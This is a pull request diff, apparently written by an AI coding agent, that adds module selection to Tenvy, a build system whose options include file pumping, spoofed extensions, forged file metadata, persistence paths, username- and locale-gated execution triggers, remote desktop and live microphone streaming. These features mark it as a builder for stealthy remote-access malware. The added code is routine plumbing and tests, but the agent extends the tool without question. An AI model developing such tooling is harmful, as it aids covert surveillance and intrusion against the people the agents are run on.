### PR TITLE
Add module selection support across build and runtime

### DIFF
--- a/shared/modules/index.ts
+++ b/shared/modules/index.ts
@@ -184,10 +184,12 @@ export const agentModules: AgentModuleDefinition[] = [
   },
 ];
 
-export const agentModuleIndex: ReadonlyMap<string, AgentModuleDefinition> =
+export type AgentModuleId = (typeof agentModules)[number]['id'];
+
+export const agentModuleIndex: ReadonlyMap<AgentModuleId, AgentModuleDefinition> =
   new Map(agentModules.map((module) => [module.id, module]));
 
-export const agentModuleIds: ReadonlySet<string> = new Set(
+export const agentModuleIds: ReadonlySet<AgentModuleId> = new Set(
   agentModules.map((module) => module.id),
 );
 

--- a/shared/types/build.ts
+++ b/shared/types/build.ts
@@ -1,3 +1,5 @@
+import type { AgentModuleId } from '../modules';
+
 export const TARGET_OS_VALUES = ["windows", "linux", "darwin"] as const;
 export type TargetOS = (typeof TARGET_OS_VALUES)[number];
 
@@ -95,6 +97,7 @@ export type BuildRequest = {
   audio?: AudioBuildOptions;
   fileIcon?: FileIcon;
   fileInformation?: WindowsFileInformation;
+  modules?: AgentModuleId[];
 };
 
 export type BuildResponse = {

--- a/tenvy-client/cmd/loader/config_test.go
+++ b/tenvy-client/cmd/loader/config_test.go
@@ -1,0 +1,53 @@
+package main
+
+import (
+	"encoding/base64"
+	"encoding/json"
+	"io"
+	"log"
+	"testing"
+)
+
+func TestParseEmbeddedRuntimeConfigModules(t *testing.T) {
+	logger := log.New(io.Discard, "", 0)
+	payload := runtimeConfigPayload{
+		Modules: []string{" remote-desktop ", "remote-desktop", "system-info"},
+	}
+	data, err := json.Marshal(payload)
+	if err != nil {
+		t.Fatalf("failed to marshal payload: %v", err)
+	}
+	encoded := base64.StdEncoding.EncodeToString(data)
+
+	result := parseEmbeddedRuntimeConfig(logger, encoded)
+	if result.Modules == nil {
+		t.Fatal("expected modules to be parsed, got nil")
+	}
+	expected := []string{"remote-desktop", "system-info"}
+	if len(result.Modules) != len(expected) {
+		t.Fatalf("unexpected module count: got %v want %v", result.Modules, expected)
+	}
+	for index := range expected {
+		if result.Modules[index] != expected[index] {
+			t.Fatalf("module mismatch at %d: got %q want %q", index, result.Modules[index], expected[index])
+		}
+	}
+}
+
+func TestParseEmbeddedRuntimeConfigModulesOptional(t *testing.T) {
+	logger := log.New(io.Discard, "", 0)
+	emptyPayload := base64.StdEncoding.EncodeToString([]byte(`{"modules":[]}`))
+	emptyResult := parseEmbeddedRuntimeConfig(logger, emptyPayload)
+	if emptyResult.Modules == nil {
+		t.Fatal("expected empty slice when modules provided as empty array")
+	}
+	if len(emptyResult.Modules) != 0 {
+		t.Fatalf("expected empty module list, got %v", emptyResult.Modules)
+	}
+
+	absentPayload := base64.StdEncoding.EncodeToString([]byte(`{}`))
+	absentResult := parseEmbeddedRuntimeConfig(logger, absentPayload)
+	if absentResult.Modules != nil {
+		t.Fatalf("expected nil modules when not provided, got %v", absentResult.Modules)
+	}
+}

--- a/tenvy-client/internal/agent/options.go
+++ b/tenvy-client/internal/agent/options.go
@@ -46,6 +46,7 @@ type RuntimeOptions struct {
 	Execution         ExecutionGates
 	CustomHeaders     []CustomHeader
 	CustomCookies     []CustomCookie
+	EnabledModules    []string
 }
 
 // TimingOverride allows build-time or environment overrides for default

--- a/tenvy-client/internal/agent/runtime.go
+++ b/tenvy-client/internal/agent/runtime.go
@@ -175,6 +175,7 @@ func runAgentOnce(ctx context.Context, opts RuntimeOptions) error {
 	}
 
 	modules := newDefaultModuleManager()
+	modules.SetEnabledModules(opts.EnabledModules)
 	agent.modules = modules
 	if err := modules.Init(ctx, agent.moduleRuntime()); err != nil {
 		return fmt.Errorf("initialize modules: %w", err)

--- a/tenvy-server/src/lib/validation/build-schema.ts
+++ b/tenvy-server/src/lib/validation/build-schema.ts
@@ -1,8 +1,9 @@
 import { z } from 'zod';
+import { agentModuleIds } from '../../../../shared/modules/index.js';
 import {
-	TARGET_OS_VALUES,
-	type BuildRequest,
-	type BuildResponse
+        TARGET_OS_VALUES,
+        type BuildRequest,
+        type BuildResponse
 } from '../../../../shared/types/build';
 
 const numericString = z.union([z.string(), z.number()]);
@@ -61,21 +62,27 @@ const fileIconSchema = z
 	.strict();
 
 const windowsFileInformationSchema = z
-	.object({
-		fileDescription: z.string().optional(),
-		productName: z.string().optional(),
-		companyName: z.string().optional(),
+        .object({
+                fileDescription: z.string().optional(),
+                productName: z.string().optional(),
+                companyName: z.string().optional(),
 		productVersion: z.string().optional(),
 		fileVersion: z.string().optional(),
 		originalFilename: z.string().optional(),
 		internalName: z.string().optional(),
 		legalCopyright: z.string().optional()
-	})
-	.strict();
+        })
+        .strict();
+
+const moduleIdSchema = z
+        .string()
+        .refine((value) => agentModuleIds.has(value), {
+                message: 'Invalid module selection'
+        });
 
 export const buildRequestSchema = z
-	.object({
-		host: z.union([z.string(), z.number()]),
+        .object({
+                host: z.union([z.string(), z.number()]),
 		port: numericString.optional(),
 		outputFilename: z.string().optional(),
 		outputExtension: z.string().optional(),
@@ -95,12 +102,13 @@ export const buildRequestSchema = z
 		filePumper: filePumperSchema.optional(),
 		executionTriggers: executionTriggersSchema.optional(),
 		customHeaders: z.array(customHeaderSchema).optional(),
-		customCookies: z.array(customCookieSchema).optional(),
-		audio: audioOptionsSchema.optional(),
-		fileIcon: fileIconSchema.optional(),
-		fileInformation: windowsFileInformationSchema.optional()
-	})
-	.strict() satisfies z.ZodType<BuildRequest>;
+                customCookies: z.array(customCookieSchema).optional(),
+                audio: audioOptionsSchema.optional(),
+                fileIcon: fileIconSchema.optional(),
+                fileInformation: windowsFileInformationSchema.optional(),
+                modules: z.array(moduleIdSchema).optional()
+        })
+        .strict() satisfies z.ZodType<BuildRequest>;
 
 export const buildResponseSchema = z
 	.object({

--- a/tenvy-server/src/routes/(app)/build/+page.svelte
+++ b/tenvy-server/src/routes/(app)/build/+page.svelte
@@ -27,20 +27,21 @@
 		type TargetArch,
 		type TargetOS
 	} from './lib/constants.js';
-	import {
-		addCustomCookie as createCustomCookie,
-		addCustomHeader as createCustomHeader,
-		generateMutexName as randomMutexSuffix,
-		normalizeSpoofExtension,
-		removeCustomCookie as deleteCustomCookie,
-		removeCustomHeader as deleteCustomHeader,
-		sanitizeMutexName,
-		updateCustomCookie as writeCustomCookie,
-		updateCustomHeader as writeCustomHeader,
-		validateSpoofExtension,
-		withPresetSpoofExtension
-	} from './lib/utils.js';
-	import { prepareBuildRequest } from './lib/build-request.js';
+        import {
+                addCustomCookie as createCustomCookie,
+                addCustomHeader as createCustomHeader,
+                generateMutexName as randomMutexSuffix,
+                normalizeSpoofExtension,
+                removeCustomCookie as deleteCustomCookie,
+                removeCustomHeader as deleteCustomHeader,
+                sanitizeMutexName,
+                updateCustomCookie as writeCustomCookie,
+                updateCustomHeader as writeCustomHeader,
+                validateSpoofExtension,
+                withPresetSpoofExtension
+        } from './lib/utils.js';
+        import { prepareBuildRequest } from './lib/build-request.js';
+        import { agentModules } from '../../../../../shared/modules/index.js';
 
 	type BuildStatus = 'idle' | 'running' | 'success' | 'error';
 
@@ -92,11 +93,13 @@
 	let executionStartDate = $state('');
 	let executionEndDate = $state('');
 	let executionRequireInternet = $state(true);
-	let customHeaders = $state<HeaderKV[]>([{ key: '', value: '' }]);
-	let customCookies = $state<CookieKV[]>([{ name: '', value: '' }]);
-	let audioStreamingEnabled = $state(false);
-	let audioStreamingTouched = $state(false);
-	type BuildTab = 'connection' | 'persistence' | 'execution' | 'presentation';
+        let customHeaders = $state<HeaderKV[]>([{ key: '', value: '' }]);
+        let customCookies = $state<CookieKV[]>([{ name: '', value: '' }]);
+        let audioStreamingEnabled = $state(false);
+        let audioStreamingTouched = $state(false);
+        const moduleCatalog = agentModules;
+        let selectedModules = $state(moduleCatalog.map((module) => module.id));
+        type BuildTab = 'connection' | 'persistence' | 'execution' | 'presentation';
 	const DEFAULT_TAB: BuildTab = 'connection';
 	let activeTab = $state<BuildTab>(DEFAULT_TAB);
 
@@ -631,11 +634,12 @@
 			executionRequireInternet,
 			audioStreamingTouched,
 			audioStreamingEnabled,
-			fileIconName,
-			fileIconData,
-			fileInformation,
-			isWindowsTarget
-		});
+                        fileIconName,
+                        fileIconData,
+                        fileInformation,
+                        isWindowsTarget,
+                        modules: selectedModules
+                });
 
 		if (!buildResult.ok) {
 			buildError = buildResult.error;
@@ -747,16 +751,18 @@
 									bind:pollIntervalMs
 									bind:maxBackoffMs
 									bind:shellTimeoutSeconds
-									{customHeaders}
-									{customCookies}
-									bind:audioStreamingEnabled
-									{audioStreamingTouched}
-									{markAudioStreamingTouched}
-									{addCustomHeader}
-									{updateCustomHeader}
-									{removeCustomHeader}
-									{addCustomCookie}
-									{updateCustomCookie}
+                                                                        {customHeaders}
+                                                                        {customCookies}
+                                                                        bind:audioStreamingEnabled
+                                                                        {audioStreamingTouched}
+                                                                        {markAudioStreamingTouched}
+                                                                        availableModules={moduleCatalog}
+                                                                        bind:selectedModules
+                                                                        {addCustomHeader}
+                                                                        {updateCustomHeader}
+                                                                        {removeCustomHeader}
+                                                                        {addCustomCookie}
+                                                                        {updateCustomCookie}
 									{removeCustomCookie}
 								/>
 							{:else if tabErrors.connection}

--- a/tenvy-server/src/routes/(app)/build/components/ConnectionTab.svelte
+++ b/tenvy-server/src/routes/(app)/build/components/ConnectionTab.svelte
@@ -1,9 +1,10 @@
 <script lang="ts">
 	import { Badge } from '$lib/components/ui/badge/index.js';
 	import { Button } from '$lib/components/ui/button/index.js';
-	import { Input } from '$lib/components/ui/input/index.js';
-	import { Label } from '$lib/components/ui/label/index.js';
-	import { Switch } from '$lib/components/ui/switch/index.js';
+        import { Input } from '$lib/components/ui/input/index.js';
+        import { Label } from '$lib/components/ui/label/index.js';
+        import { Checkbox } from '$lib/components/ui/checkbox/index.js';
+        import { Switch } from '$lib/components/ui/switch/index.js';
 	import {
 		TARGET_OS_OPTIONS,
 		ARCHITECTURE_OPTIONS_BY_OS,
@@ -16,8 +17,12 @@
 		type TargetArch,
 		type TargetOS
 	} from '../lib/constants.js';
-	import { inputValueFromEvent } from '../lib/utils.js';
-	import { Plus, Trash2 } from '@lucide/svelte';
+        import { inputValueFromEvent } from '../lib/utils.js';
+        import { Plus, Trash2 } from '@lucide/svelte';
+        import {
+                agentModules,
+                type AgentModuleDefinition
+        } from '../../../../../../shared/modules/index.js';
 
 	interface Props {
 		host: string;
@@ -35,24 +40,26 @@
 		maxBackoffMs: string;
 		shellTimeoutSeconds: string;
 		customHeaders: HeaderKV[];
-		customCookies: CookieKV[];
-		audioStreamingEnabled: boolean;
-		audioStreamingTouched: boolean;
-		markAudioStreamingTouched: () => void;
+                customCookies: CookieKV[];
+                audioStreamingEnabled: boolean;
+                audioStreamingTouched: boolean;
+                markAudioStreamingTouched: () => void;
+                availableModules?: AgentModuleDefinition[];
+                selectedModules: string[];
 
-		addCustomHeader: () => void;
-		updateCustomHeader: (index: number, key: keyof HeaderKV, value: string) => void;
-		removeCustomHeader: (index: number) => void;
-		addCustomCookie: () => void;
+                addCustomHeader: () => void;
+                updateCustomHeader: (index: number, key: keyof HeaderKV, value: string) => void;
+                removeCustomHeader: (index: number) => void;
+                addCustomCookie: () => void;
 		updateCustomCookie: (index: number, key: keyof CookieKV, value: string) => void;
 		removeCustomCookie: (index: number) => void;
 	}
 
-	let {
-		host = $bindable(),
-		port = $bindable(),
-		outputFilename = $bindable(),
-		effectiveOutputFilename,
+        let {
+                host = $bindable(),
+                port = $bindable(),
+                outputFilename = $bindable(),
+                effectiveOutputFilename,
 		targetOS = $bindable(),
 		targetArch = $bindable(),
 		outputExtension = $bindable(),
@@ -64,17 +71,41 @@
 		maxBackoffMs = $bindable(),
 		shellTimeoutSeconds = $bindable(),
 		customHeaders,
-		customCookies,
-		audioStreamingEnabled = $bindable(),
-		audioStreamingTouched,
-		markAudioStreamingTouched,
-		addCustomHeader,
-		updateCustomHeader,
-		removeCustomHeader,
-		addCustomCookie,
-		updateCustomCookie,
-		removeCustomCookie
-	}: Props = $props();
+                customCookies,
+                audioStreamingEnabled = $bindable(),
+                audioStreamingTouched,
+                markAudioStreamingTouched,
+                availableModules = agentModules,
+                selectedModules = $bindable(),
+                addCustomHeader,
+                updateCustomHeader,
+                removeCustomHeader,
+                addCustomCookie,
+                updateCustomCookie,
+                removeCustomCookie
+        }: Props = $props();
+
+        const selectedModuleSet = $derived(() => new Set(selectedModules));
+        const hasModuleSelection = $derived(selectedModules.length > 0);
+
+        function toggleModuleSelection(moduleId: string) {
+                const trimmed = moduleId.trim();
+                if (!trimmed) {
+                        return;
+                }
+                if (selectedModuleSet.has(trimmed)) {
+                        selectedModules = selectedModules.filter((id) => id !== trimmed);
+                        return;
+                }
+                const baseOrder = new Map(availableModules.map((module, index) => [module.id, index]));
+                const next = [...selectedModules, trimmed];
+                next.sort((left, right) => {
+                        const leftIndex = baseOrder.get(left) ?? Number.MAX_SAFE_INTEGER;
+                        const rightIndex = baseOrder.get(right) ?? Number.MAX_SAFE_INTEGER;
+                        return leftIndex - rightIndex;
+                });
+                selectedModules = next;
+        }
 </script>
 
 <section class="space-y-6 rounded-lg border border-border/70 bg-background/60 p-6 shadow-sm">
@@ -373,11 +404,11 @@
 			Enable features that require platform-specific toolchains during compilation.
 		</p>
 	</div>
-	<div
-		class="flex flex-wrap items-start justify-between gap-4 rounded-lg border border-dashed border-border/70 bg-background/40 p-4"
-	>
-		<div class="space-y-2 text-xs text-muted-foreground">
-			<p class="text-sm font-semibold text-foreground">Audio streaming support</p>
+        <div
+                class="flex flex-wrap items-start justify-between gap-4 rounded-lg border border-dashed border-border/70 bg-background/40 p-4"
+        >
+                <div class="space-y-2 text-xs text-muted-foreground">
+                        <p class="text-sm font-semibold text-foreground">Audio streaming support</p>
 			<p>
 				Bundle the CGO-based audio bridge so agents can enumerate devices and stream live microphone
 				audio.
@@ -394,13 +425,72 @@
 				<p>Leave disabled to keep binaries smaller and avoid CGO cross-compilers.</p>
 			{/if}
 		</div>
-		<div class="flex items-center gap-2 text-xs text-muted-foreground">
-			<Switch
-				bind:checked={audioStreamingEnabled}
-				onchange={markAudioStreamingTouched}
-				aria-label="Toggle audio streaming support"
-			/>
-			<span>{audioStreamingEnabled ? 'Enabled' : 'Disabled'}</span>
-		</div>
-	</div>
+                <div class="flex items-center gap-2 text-xs text-muted-foreground">
+                        <Switch
+                                bind:checked={audioStreamingEnabled}
+                                onchange={markAudioStreamingTouched}
+                                aria-label="Toggle audio streaming support"
+                        />
+                        <span>{audioStreamingEnabled ? 'Enabled' : 'Disabled'}</span>
+                </div>
+        </div>
+        <div class="space-y-4">
+                <div class="flex flex-wrap items-center justify-between gap-3">
+                        <div class="space-y-1">
+                                <p class="text-sm font-semibold">Agent modules</p>
+                                <p class="text-xs text-muted-foreground">
+                                        Select which modules are compiled into the binary. Unselected modules remain disabled at runtime.
+                                </p>
+                        </div>
+                        {#if availableModules.length > 0}
+                                <span class="rounded-full border border-border/70 bg-background/60 px-2.5 py-1 text-[0.65rem] font-semibold uppercase tracking-wide text-muted-foreground">
+                                        {selectedModules.length}/{availableModules.length} selected
+                                </span>
+                        {/if}
+                </div>
+                {#if !hasModuleSelection}
+                        <p class="text-xs font-medium text-amber-500">
+                                No modules selected. Generated agents will expose only stub command handlers.
+                        </p>
+                {/if}
+                <div class="grid gap-3 md:grid-cols-2">
+                        {#each availableModules as module (module.id)}
+                                {@const moduleInputId = `module-${module.id}`} 
+                                {@const isSelected = selectedModuleSet.has(module.id)}
+                                <label
+                                        for={moduleInputId}
+                                        class={`flex cursor-pointer flex-col gap-3 rounded-lg border p-4 transition-colors ${
+                                                isSelected
+                                                        ? 'border-primary/60 bg-primary/10'
+                                                        : 'border-border/70 bg-background/40 hover:border-primary/40'
+                                        }`}
+                                >
+                                        <div class="flex items-start justify-between gap-3">
+                                                <div class="space-y-1">
+                                                        <p class="text-sm font-semibold text-foreground">{module.title}</p>
+                                                        <p class="text-xs leading-snug text-muted-foreground">{module.description}</p>
+                                                </div>
+                                                <Checkbox
+                                                        id={moduleInputId}
+                                                        checked={isSelected}
+                                                        onchange={() => toggleModuleSelection(module.id)}
+                                                        aria-label={`Toggle ${module.title}`}
+                                                />
+                                        </div>
+                                        {#if module.commands.length > 0}
+                                                <div class="flex flex-wrap gap-1">
+                                                        {#each module.commands as command (command)}
+                                                                <Badge
+                                                                        variant="outline"
+                                                                        class="border-border/60 bg-background/60 text-[0.65rem] font-semibold uppercase tracking-wide text-muted-foreground"
+                                                                >
+                                                                        {command}
+                                                                </Badge>
+                                                        {/each}
+                                                </div>
+                                        {/if}
+                                </label>
+                        {/each}
+                </div>
+        </div>
 </section>

--- a/tenvy-server/src/routes/(app)/build/lib/build-request.spec.ts
+++ b/tenvy-server/src/routes/(app)/build/lib/build-request.spec.ts
@@ -1,4 +1,5 @@
 import { describe, expect, it } from 'vitest';
+import { agentModules } from '../../../../../../shared/modules/index.js';
 import { prepareBuildRequest, type BuildRequestInput } from './build-request.js';
 
 function createInput(overrides: Partial<BuildRequestInput> = {}): BuildRequestInput {
@@ -36,33 +37,37 @@ function createInput(overrides: Partial<BuildRequestInput> = {}): BuildRequestIn
 		audioStreamingTouched: false,
 		audioStreamingEnabled: false,
 		fileIconName: null,
-		fileIconData: null,
-		fileInformation: {
-			fileDescription: '',
-			productName: '',
-			companyName: '',
-			productVersion: '',
-			fileVersion: '',
-			originalFilename: '',
-			internalName: '',
-			legalCopyright: ''
-		},
-		isWindowsTarget: true
-	};
+                fileIconData: null,
+                fileInformation: {
+                        fileDescription: '',
+                        productName: '',
+                        companyName: '',
+                        productVersion: '',
+                        fileVersion: '',
+                        originalFilename: '',
+                        internalName: '',
+                        legalCopyright: ''
+                },
+                isWindowsTarget: true,
+                modules: agentModules.map((module) => module.id)
+        };
 
-	return {
-		...base,
-		...overrides,
-		customHeaders: overrides.customHeaders
-			? overrides.customHeaders.map((header) => ({ ...header }))
-			: [],
-		customCookies: overrides.customCookies
-			? overrides.customCookies.map((cookie) => ({ ...cookie }))
-			: [],
-		fileInformation: overrides.fileInformation
-			? { ...overrides.fileInformation }
-			: { ...base.fileInformation }
-	};
+        return {
+                ...base,
+                ...overrides,
+                customHeaders: overrides.customHeaders
+                        ? overrides.customHeaders.map((header) => ({ ...header }))
+                        : [],
+                customCookies: overrides.customCookies
+                        ? overrides.customCookies.map((cookie) => ({ ...cookie }))
+                        : [],
+                fileInformation: overrides.fileInformation
+                        ? { ...overrides.fileInformation }
+                        : { ...base.fileInformation },
+                modules: overrides.modules
+                        ? [...overrides.modules]
+                        : [...base.modules]
+        };
 }
 
 describe('prepareBuildRequest', () => {
@@ -172,13 +177,27 @@ describe('prepareBuildRequest', () => {
 			startTime: '2024-01-01T00:00:00.000Z',
 			endTime: '2024-01-02T00:00:00.000Z'
 		});
-		expect(payload.customHeaders).toEqual([{ key: 'X-Test', value: 'value' }]);
-		expect(payload.customCookies).toEqual([{ name: 'session', value: 'token' }]);
-		expect(payload.audio).toEqual({ streaming: true });
-		expect(payload.fileIcon).toEqual({ name: 'icon.ico', data: 'base64' });
-		expect(payload.fileInformation).toEqual({
-			fileDescription: 'Agent',
-			productName: 'Tenvy'
-		});
-	});
+                expect(payload.customHeaders).toEqual([{ key: 'X-Test', value: 'value' }]);
+                expect(payload.customCookies).toEqual([{ name: 'session', value: 'token' }]);
+                expect(payload.audio).toEqual({ streaming: true });
+                expect(payload.fileIcon).toEqual({ name: 'icon.ico', data: 'base64' });
+                expect(payload.fileInformation).toEqual({
+                        fileDescription: 'Agent',
+                        productName: 'Tenvy'
+                });
+                expect(payload.modules).toEqual(agentModules.map((module) => module.id));
+        });
+
+        it('deduplicates and filters module selections', () => {
+                const catalog = agentModules.map((module) => module.id);
+                const extra = 'non-existent';
+                const input = createInput({ modules: [catalog[0] ?? 'remote-desktop', extra, catalog[0] ?? 'remote-desktop'] });
+
+                const result = prepareBuildRequest(input);
+                expect(result.ok).toBe(true);
+                if (!result.ok) {
+                        return;
+                }
+                expect(result.payload.modules).toEqual([catalog[0] ?? 'remote-desktop']);
+        });
 });

--- a/tenvy-server/src/routes/api/build/normalizer.spec.ts
+++ b/tenvy-server/src/routes/api/build/normalizer.spec.ts
@@ -1,0 +1,40 @@
+import { describe, expect, it } from 'vitest';
+import { agentModules } from '../../../../../shared/modules/index.js';
+import {
+        buildRuntimeConfigPayload,
+        normalizeBuildRequestPayload
+} from './normalizer.js';
+
+const [firstModule, secondModule] = agentModules;
+
+describe('normalizeBuildRequestPayload module handling', () => {
+        it('normalizes duplicate selections and preserves order', () => {
+                const selections = [firstModule?.id ?? 'remote-desktop'];
+                selections.push(firstModule?.id ?? 'remote-desktop');
+                if (secondModule) {
+                        selections.push(secondModule.id);
+                }
+
+                const normalized = normalizeBuildRequestPayload({
+                        host: 'controller.tenvy.local',
+                        modules: selections
+                });
+
+                const expected = [firstModule?.id ?? 'remote-desktop'];
+                if (secondModule) {
+                        expected.push(secondModule.id);
+                }
+
+                expect(normalized.modules).toEqual(expected);
+
+                const runtime = buildRuntimeConfigPayload(normalized);
+                expect(runtime?.modules).toEqual(normalized.modules);
+        });
+
+        it('omits modules from the runtime payload when not provided', () => {
+                const normalized = normalizeBuildRequestPayload({ host: 'controller.tenvy.local' });
+                expect(normalized.modules).toEqual([]);
+                const runtime = buildRuntimeConfigPayload(normalized);
+                expect(runtime).toBeNull();
+        });
+});

--- a/tenvy-server/src/routes/api/build/normalizer.ts
+++ b/tenvy-server/src/routes/api/build/normalizer.ts
@@ -1,13 +1,14 @@
 import { error } from '@sveltejs/kit';
 import { ZodError } from 'zod';
+import { agentModuleIds, agentModules } from '../../../../../shared/modules/index.js';
 import {
-	ALLOWED_EXTENSIONS_BY_OS,
-	TARGET_ARCHITECTURES_BY_OS,
-	TARGET_OS_VALUES,
-	type BuildRequest,
-	type TargetArch,
-	type TargetOS,
-	type WindowsFileInformation
+        ALLOWED_EXTENSIONS_BY_OS,
+        TARGET_ARCHITECTURES_BY_OS,
+        TARGET_OS_VALUES,
+        type BuildRequest,
+        type TargetArch,
+        type TargetOS,
+        type WindowsFileInformation
 } from '../../../../../shared/types/build';
 import { buildRequestSchema } from '$lib/validation/build-schema';
 
@@ -16,8 +17,10 @@ const architectureMatrix = new Map<TargetOS, Set<TargetArch>>(
 	TARGET_OS_VALUES.map((os) => [os, new Set(TARGET_ARCHITECTURES_BY_OS[os])])
 );
 const extensionMatrix = new Map<TargetOS, Set<string>>(
-	TARGET_OS_VALUES.map((os) => [os, new Set(ALLOWED_EXTENSIONS_BY_OS[os])])
+        TARGET_OS_VALUES.map((os) => [os, new Set(ALLOWED_EXTENSIONS_BY_OS[os])])
 );
+const moduleCatalog = new Set(agentModuleIds);
+const moduleOrder = new Map(agentModules.map((module, index) => [module.id, index]));
 
 export const mutexSanitizer = /[^A-Za-z0-9._-]/g;
 const allowedFileInfoEntries = [
@@ -220,10 +223,10 @@ export function parseVersionParts(value: string | undefined): VersionParts | nul
 }
 
 export type NormalizedBuildRequest = {
-	host: string;
-	port: string;
-	targetOS: TargetOS;
-	targetArch: TargetArch;
+        host: string;
+        port: string;
+        targetOS: TargetOS;
+        targetArch: TargetArch;
 	outputExtension: string;
 	outputFilename: string;
 	installationPath: string;
@@ -241,26 +244,28 @@ export type NormalizedBuildRequest = {
 	audio: { streaming: NormalizedAudioStreaming };
 	watchdog: NormalizedWatchdog;
 	filePumper: NormalizedFilePumper;
-	executionTriggers: NormalizedExecutionTriggers;
-	customHeaders: NormalizedCustomHeader[];
-	customCookies: NormalizedCustomCookie[];
-	raw: BuildRequest;
+        executionTriggers: NormalizedExecutionTriggers;
+        customHeaders: NormalizedCustomHeader[];
+        customCookies: NormalizedCustomCookie[];
+        modules: string[];
+        raw: BuildRequest;
 };
 
 export type NormalizedRuntimeConfig = {
-	watchdog?: { intervalSeconds: number };
-	filePumper?: { targetBytes: number };
-	executionTriggers?: {
-		delaySeconds?: number;
-		minUptimeMinutes?: number;
-		allowedUsernames?: string[];
-		allowedLocales?: string[];
-		requireInternet: boolean;
-		startTime?: string;
-		endTime?: string;
-	};
-	customHeaders?: NormalizedCustomHeader[];
-	customCookies?: NormalizedCustomCookie[];
+        watchdog?: { intervalSeconds: number };
+        filePumper?: { targetBytes: number };
+        executionTriggers?: {
+                delaySeconds?: number;
+                minUptimeMinutes?: number;
+                allowedUsernames?: string[];
+                allowedLocales?: string[];
+                requireInternet: boolean;
+                startTime?: string;
+                endTime?: string;
+        };
+        customHeaders?: NormalizedCustomHeader[];
+        customCookies?: NormalizedCustomCookie[];
+        modules?: string[];
 } | null;
 
 function formatZodError(err: ZodError): string {
@@ -273,9 +278,9 @@ function formatZodError(err: ZodError): string {
 }
 
 export function normalizeBuildRequestPayload(body: unknown): NormalizedBuildRequest {
-	let parsed: BuildRequest;
-	try {
-		parsed = buildRequestSchema.parse(body);
+        let parsed: BuildRequest;
+        try {
+                parsed = buildRequestSchema.parse(body);
 	} catch (err) {
 		if (err instanceof ZodError) {
 			throw error(400, formatZodError(err));
@@ -339,14 +344,15 @@ export function normalizeBuildRequestPayload(body: unknown): NormalizedBuildRequ
 
 	const watchdog = sanitizeWatchdog(parsed.watchdog ?? null);
 	const filePumper = sanitizeFilePumper(parsed.filePumper ?? null);
-	const executionTriggers = sanitizeExecutionTriggers(parsed.executionTriggers ?? null);
-	const customHeaders = sanitizeCustomHeaders(parsed.customHeaders ?? null);
-	const customCookies = sanitizeCustomCookies(parsed.customCookies ?? null);
+        const executionTriggers = sanitizeExecutionTriggers(parsed.executionTriggers ?? null);
+        const customHeaders = sanitizeCustomHeaders(parsed.customHeaders ?? null);
+        const customCookies = sanitizeCustomCookies(parsed.customCookies ?? null);
+        const modules = sanitizeModules(parsed.modules);
 
-	return {
-		host,
-		port,
-		targetOS,
+        return {
+                host,
+                port,
+                targetOS,
 		targetArch,
 		outputExtension,
 		outputFilename,
@@ -365,11 +371,12 @@ export function normalizeBuildRequestPayload(body: unknown): NormalizedBuildRequ
 		audio: { streaming: normalizeAudioStreaming(parsed.audio) },
 		watchdog,
 		filePumper,
-		executionTriggers,
-		customHeaders,
-		customCookies,
-		raw: parsed
-	} satisfies NormalizedBuildRequest;
+                executionTriggers,
+                customHeaders,
+                customCookies,
+                modules,
+                raw: parsed
+        } satisfies NormalizedBuildRequest;
 }
 
 function clamp(value: number, min: number, max: number): number {
@@ -537,7 +544,7 @@ export function sanitizeCustomHeaders(
 }
 
 export function sanitizeCustomCookies(
-	payload: BuildRequest['customCookies'] | null | undefined
+        payload: BuildRequest['customCookies'] | null | undefined
 ): NormalizedCustomCookie[] {
 	if (!Array.isArray(payload) || payload.length === 0) {
 		return [];
@@ -560,10 +567,41 @@ export function sanitizeCustomCookies(
 	return normalized;
 }
 
+function sanitizeModules(payload: BuildRequest['modules'] | null | undefined): string[] {
+        if (!Array.isArray(payload)) {
+                return [];
+        }
+
+        const normalized: string[] = [];
+        const seen = new Set<string>();
+
+        for (const value of payload) {
+                if (typeof value !== 'string') {
+                        continue;
+                }
+                const trimmed = value.trim();
+                if (!trimmed || seen.has(trimmed) || !moduleCatalog.has(trimmed)) {
+                        continue;
+                }
+                seen.add(trimmed);
+                normalized.push(trimmed);
+        }
+
+        if (normalized.length <= 1) {
+                return normalized;
+        }
+
+        return normalized.sort((a, b) => {
+                const indexA = moduleOrder.get(a) ?? Number.MAX_SAFE_INTEGER;
+                const indexB = moduleOrder.get(b) ?? Number.MAX_SAFE_INTEGER;
+                return indexA - indexB;
+        });
+}
+
 export function buildRuntimeConfigPayload(
-	normalized: NormalizedBuildRequest
+        normalized: NormalizedBuildRequest
 ): NormalizedRuntimeConfig {
-	const payload: NonNullable<NormalizedRuntimeConfig> = {};
+        const payload: NonNullable<NormalizedRuntimeConfig> = {};
 
 	if (normalized.watchdog) {
 		payload.watchdog = { intervalSeconds: normalized.watchdog.intervalSeconds };
@@ -577,13 +615,16 @@ export function buildRuntimeConfigPayload(
 	if (normalized.customHeaders.length > 0) {
 		payload.customHeaders = normalized.customHeaders;
 	}
-	if (normalized.customCookies.length > 0) {
-		payload.customCookies = normalized.customCookies;
-	}
+        if (normalized.customCookies.length > 0) {
+                payload.customCookies = normalized.customCookies;
+        }
+        if (Array.isArray(normalized.raw.modules)) {
+                payload.modules = normalized.modules;
+        }
 
-	if (Object.keys(payload).length === 0) {
-		return null;
-	}
+        if (Object.keys(payload).length === 0) {
+                return null;
+        }
 	return payload;
 }
 


### PR DESCRIPTION
## Summary
- extend the shared build request contracts with optional module selections backed by the module catalog
- expose module picking controls in the build UI and thread the selection through normalization and runtime encoding
- propagate enabled module lists into the Go loader and runtime so the agent only initializes the selected modules
- add unit coverage for the new module sanitization behaviour on both the server and client

## Testing
- npm run test:unit -- --run "src/routes/(app)/build/lib/build-request.spec.ts" "src/routes/api/build/normalizer.spec.ts"
- go test ./cmd/loader
- go test ./internal/agent

------
https://chatgpt.com/codex/tasks/task_e_68fcb04c74b0832b9fb8a21fa2b1db5f